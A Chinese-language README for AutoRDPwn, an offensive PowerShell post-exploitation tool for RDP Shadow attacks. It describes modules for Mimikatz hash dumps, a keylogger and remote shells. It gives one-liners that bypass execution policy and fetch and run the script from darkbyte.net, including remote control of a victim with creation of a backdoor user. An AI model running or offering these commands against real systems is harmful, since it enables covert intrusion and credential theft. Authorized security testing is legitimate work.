
AutoRDPwn 是一个基于 Powershell 的后渗透框架,主要用于自动化针对 Microsoft Windows 计算机的 Shadow 攻击。此漏洞(被微软列为一项功能)允许远程攻击者在未经受害者同意的情况下查看其桌面,甚至根据需要控制它,仅使用操作系统自带的工具。
得益于附加模块,可以通过 Netcat 获得远程 Shell,使用 Mimikatz 转储系统哈希,加载远程键盘记录器等等。所有这一切,通过一个完全直观的菜单,支持七种不同的语言。
此外,还可以通过一系列参数在反向 Shell 中使用它,这些参数在用法部分中有描述。
Powershell 4.0 或更高版本
• 修复了许多错误
• 界面美化并改进了等待时间
• 通过系统设置支持代理感知连接
• 现在可以通过下载 .zip 文件离线使用该工具
• 按回车键自动检测语言
• Invoke-DCOM 已被 SharpRDP 替换
• PowerUp 已被 Invoke-PrivescCheck 替换
• 在受害者机器上创建自动清理子程序
• 新模块可用:使用 AES 加密的 SMB Shell
• 新模块可用:使用 RunAs 切换用户
*其余更改可参见 CHANGELOG 文件
此应用程序可以在本地、远程或用于在团队间跳板使用。
当在反向 Shell 中远程使用时,需要使用以下参数:
| 参数 | 描述 |
|---|---|
| -admin / -noadmin | 根据我们拥有的权限,使用其中一个 |
| -nogui | 这将避免加载菜单和一些颜色,确保其功能正常 |
| -lang | 我们将选择我们的语言(英语、西班牙语、法语、德语、意大利语、俄语或葡萄牙语) |
| -option | 与菜单一样,我们可以选择如何发起攻击 |
| -shadow | 我们将决定是查看还是控制远程设备 |
| -createuser | 此参数可选,将在受害者机器上创建 AutoRDPwn:AutoRDPwn 用户 |
| -noclean | 禁用撤销受害者计算机上所有更改的过程 |
单行本地执行:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
单行远程执行示例:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

本项目遵循 GNU 3.0 许可证 - 详情请参阅 LICENSE 文件。
该框架由 Joel Gámez Molina // @JoelGMSec 从零开始创建和设计。
某些模块使用了第三方代码、脚本和工具,特别是:
• Chachi-Enumerator 由 Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m 由 Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp 由 Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash 由 Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz 由 Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec 由 Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper 由 Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP 由 Steven F --> https://github.com/0xthirteen/SharpRDP
以及更多因篇幅限制未能列出的工具。感谢他们所有人以及他们的出色工作。
本软件不提供任何形式的保证。其使用仅限于教育环境和/或经客户同意进行的安全审计。我对任何滥用或由此造成的任何可能的损害不承担责任。
更多信息,可在 Twitter 上找到我 @JoelGMSec,以及我的博客 darkbyte.net。
您可以通过请我喝咖啡来支持我的工作: